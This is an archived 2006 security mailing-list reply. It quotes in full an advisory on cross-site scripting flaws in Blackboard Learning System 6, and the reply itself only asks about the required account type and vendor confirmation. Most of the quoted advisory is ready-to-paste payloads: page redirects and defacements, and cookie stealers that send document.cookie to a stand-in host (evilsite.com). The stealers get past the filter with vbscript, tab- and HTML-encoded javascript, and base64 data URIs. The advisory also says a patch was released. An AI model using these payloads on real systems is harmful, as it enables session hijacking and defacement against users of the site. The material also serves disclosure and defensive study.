[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: BlackBoard Multiple Vulnerabilities (XSS)

To: Pr070n@xxxxxxxxx
Subject: Re: BlackBoard Multiple Vulnerabilities (XSS)
From: "C. Hamby" <fixer@xxxxxxx>
Date: Tue, 22 Aug 2006 16:57:40 -0800

What type of an account do you have to have and in what sections can
this be exploited?
Also, has Blackboard verified this in their current release (7.1)?

-cdh


Pr070n@xxxxxxxxx wrote:
> -----------------------------------------------------------------------------------------
> 
> 
> Found by: PrOtOn & digi7al64
> 
> 
> Date: May 20th 2006
> 
> 
> Critical Level: High
> 
> 
> Type: Multiple Cross Site Scripting (XSS) vunerabilities
> 
> 
> 
> ------------------------------------------------------------------------------------------
> 
> 
> 
> Software:
> 
> Blackboard Learning System (Release 6) Blackboard Learning and Community 
> Portal Suite (Release6)-6.2.3.23
> 
> 
> 
> ------------------------------------------------------------------------------------------
> 
> 
> 
> Explanation: You can inject HTML, VB code and or Javascript into specific 
> tags to steal 
> 
> cookies, deface the site using frame busters or even redirect to external 
> sites for phishing purposes. 
> 
> If you have limited access, then a simple post into the Discussion Board 
> using the right 
> 
> tags with the right code (provided below) will execute the vulnerability(ies).
> 
> 
> 
> -------------------------------------------------------------------------------------------
> 
> 
> About:
> 
> Blackboards parsing system only checks for the string "javascript", Thus 
> vbscript code can be injected at will into tags as well as any versions of 
> javascript that uses uncommon syntax (ie tabs encoding etc)
> 
> 
> -------------------------------------------------------------------------------------------
> 
> Vulnerabilities:
> 
> 
> Defacement (FrameBuster)
> 
> -------------------------
> 
> <meta http-equiv="refresh"
> 
> content="15;url= http://evilsite.com";>
> 
> 
> 
> Defacement (FrameBuster)
> 
> -------------------------
> 
> <iframe src=" http://evilsite.com"; width=100
> 
> height=100></iframe>
> 
> 
> 
> Defacement (IE ONLY)
> 
> -------------------------
> 
> <img src=vbscript:document.write("defaced_by_insane_script_kiddies")>
> 
> 
> 
> Defacement (IE ONLY)
> 
> -------------------------
> 
> <link rel="stylesheet"
> 
> href=vbscript:document.write("defaced_by_insane_script_kiddies")>
> 
> 
> <img src=vb script:document.write("defaced_by_insane_script_kiddies")>
> 
> 
> 
> Cookie Stealer (IE ONLY)
> 
> -------------------------
> 
> 
> <img
> 
> src="vbscript:wintest=window.open(%22http://evilsite.com + 
> document.cookie)"style=visibility:hidden/>
> 
> <img src="vbscript:window.focus ()"style=visibility:hidden/>
> 
> <img src="vbscript: window.close()"style=visibility:hidden/>
> 
> 
> 
> Cookie Stealer (IE ONLY)
> 
> -------------------------
> 
> <link rel="stylesheet"
> 
> href="vbscript:wintest=window.open(%22http://evilsite.com+document.cookie)">
> 
> 
> 
> Cookie Stealer (Encoded Tab - IE ONLY)
> 
> -------------------------
> 
> <img
> 
> src="jav&#x09;ascript: 
> document.images[1].src=%22http://evilsite.com+document.cookie;";<img src="jav
> 
> ascript:document.images[1].src=%22http://evilsite.com+document.cookie;"style=visibility:hidden/>
> 
> 
> 
> Cookie Stealer (html encoded - IE ONLY)
> 
> -------------------------
> 
> <img
> 
> src='&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;document.images[1].s
> 
> rc=" http://evilsite.com"+document.cookie;'<img
> 
> src="jav
> 
> ascript:document.images[1].src=%22http://evilsite.com+document.cookie;"style=visibility:hidden/>
> 
> 
> 
> Cookie Stealer (tabs - IE ONLY)
> 
> -------------------------
> 
> <img src="jav
> 
> ascript:document.images[1].src=%22http://evilsite.com+document.cookie;"style=visibility:hidden/>
> 
> 
> 
> Cookie Stealer (body tag with tabs - IE ONLY)
> 
> -------------------------
> 
> <body background="jav
> 
> ascript:document.images[1].src=%22http://evilsite.com+document.cookie;";>
> 
> 
> 
> Cookie Stealer (div tag with tabs - IE ONLY)
> 
> -------------------------
> 
> <div style="background-image: url(jav
> 
> ascript:document.images[1].src=%22http://evilsite.com+document.cookie;)">
> 
> 
> 
> Cookie Stealer (firefox)
> 
> -------------------------
> 
> <META HTTP-EQUIV="refresh"
> 
> CONTENT="0;url=data:text/html;base64,PHNjcmlwdCBzcmM9Imh0dHA6Ly9ldmlsc2l0ZS5jb20vY29va2llLmpzIj48L3NjcmlwdD4=">
> 
> 
> 
> Cookie Stealer (firefox - click to work)
> 
> -------------------------
> 
> <a
> 
> href="data:text/html;base64,PHNjcmlwdCBzcmM9Imh0dHA6Ly9ldmlsc2l0ZS5jb20vY29va2llLmpzIj48L3NjcmlwdD4=">hmmm</a>
>   
> 
> 
> 
> ---------------------------------------------------------------------------------------------
> 
> 
> 
> Disclaimer:
> 
> Myself or any other person involved with this discovery will not be 
> responsible for what you 
> 
> do with this information.
> 
> Blackboard developers have been contacted by me and a patch has been released 
> according to them.
> 
> 
> 
> -----------------------------------------------------------------------------------------------
> 
> 
> 
> Shout Outs:
> 
> r0xes, criticalsecurity(dot)net, Infowar(dot)com
> 
> 
> 
> ------------------------------------------------------------------------------------------------
> 
> 
> 
> Contact:
> 
> Pr070n(at)gmail(dot)com
> 
> Digi7al64(at)gmail(dot)com
> 
> 
> 
> -------------------------------------------------------------------------------------------------
>

References:
- BlackBoard Multiple Vulnerabilities (XSS)
  - From: Pr070n

Prev by Date: faille include in "VeriTECH" isreal
Next by Date: Symantec Gateway Security DNS exploit
Previous by thread: BlackBoard Multiple Vulnerabilities (XSS)
Next by thread: Re: BlackBoard Multiple Vulnerabilities (XSS)
Index(es):
- Date
- Thread